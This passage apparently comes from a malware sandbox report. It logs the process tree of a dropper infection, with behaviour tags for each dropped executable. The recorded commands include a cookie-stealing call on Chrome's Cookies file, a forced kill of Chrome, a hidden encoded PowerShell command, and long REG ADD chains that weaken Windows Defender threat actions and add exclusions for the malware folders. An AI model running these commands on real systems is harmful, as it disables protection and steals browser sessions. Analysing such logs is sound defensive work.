- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\sIpIp8e47BP1VcHVARCfUine.exe"C:\Users\Admin\Pictures\Adobe Films\sIpIp8e47BP1VcHVARCfUine.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 4807⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\X7p8DAJapV2plcOlRWrUMceZ.exe"C:\Users\Admin\Pictures\Adobe Films\X7p8DAJapV2plcOlRWrUMceZ.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 4807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 4887⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\KcBtvrYq9fL_fqAa9lshzZPt.exe"C:\Users\Admin\Pictures\Adobe Films\KcBtvrYq9fL_fqAa9lshzZPt.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\Wxso6Fql0X0kQt7DMcN6_hQ5.exe"C:\Users\Admin\Pictures\Adobe Films\Wxso6Fql0X0kQt7DMcN6_hQ5.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\VOhyRmihGf9WsLhyN6G_g8JR.exe"C:\Users\Admin\Pictures\Adobe Films\VOhyRmihGf9WsLhyN6G_g8JR.exe"7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\VRTW_12CdurcHkoz22bAhYDD.exe"C:\Users\Admin\Pictures\Adobe Films\VRTW_12CdurcHkoz22bAhYDD.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\UrjC.cPL",8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\UrjC.cPL",9⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 6244⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10e3b1ea69c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10cb78a30b1eccca7.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun100b7a261a58b.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10fe8d167a9b78.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1069185a7827c7.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun104c7903af4dec620.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10e55122fb.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10544058cc.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10f1da220d4c037e1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10e3b1ea69c.exeSun10e3b1ea69c.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10e3b1ea69c.exeC:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10e3b1ea69c.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun104c7903af4dec620.exeSun104c7903af4dec620.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-V8CR8.tmp\Sun104c7903af4dec620.tmp"C:\Users\Admin\AppData\Local\Temp\is-V8CR8.tmp\Sun104c7903af4dec620.tmp" /SL5="$4016A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun104c7903af4dec620.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun104c7903af4dec620.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun104c7903af4dec620.exe" /SILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-36U6D.tmp\Sun104c7903af4dec620.tmp"C:\Users\Admin\AppData\Local\Temp\is-36U6D.tmp\Sun104c7903af4dec620.tmp" /SL5="$5016A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun104c7903af4dec620.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10f1da220d4c037e1.exeSun10f1da220d4c037e1.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10544058cc.exeSun10544058cc.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun1069185a7827c7.exeSun1069185a7827c7.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",2⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",3⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JPlQhKv.cPL",4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun100b7a261a58b.exeSun100b7a261a58b.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4652 -ip 46521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10cb78a30b1eccca7.exeSun10cb78a30b1eccca7.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10fe8d167a9b78.exeSun10fe8d167a9b78.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8B295E9D\Sun10e55122fb.exeSun10e55122fb.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 17882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4628 -ip 46281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1912 -ip 19121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4252 -ip 42521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5224 -ip 52241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5240 -ip 52401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5240 -ip 52401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 3088 -ip 30881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4252 -ip 42521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5224 -ip 52241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4252 -ip 42521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4252 -ip 42521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3904 -ip 39041⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 1012 -ip 10121⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4248 -ip 42481⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1012 -s 14881⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3904 -ip 39041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3904 -ip 39041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4252 -ip 42521⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3904 -ip 39041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3904 -ip 39041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6068 -ip 60681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4616 -ip 46161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 532 -p 3468 -ip 34681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\DVBBKEq.exeC:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\DVBBKEq.exe j1 /site_id 525403 /S1⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:323⤵
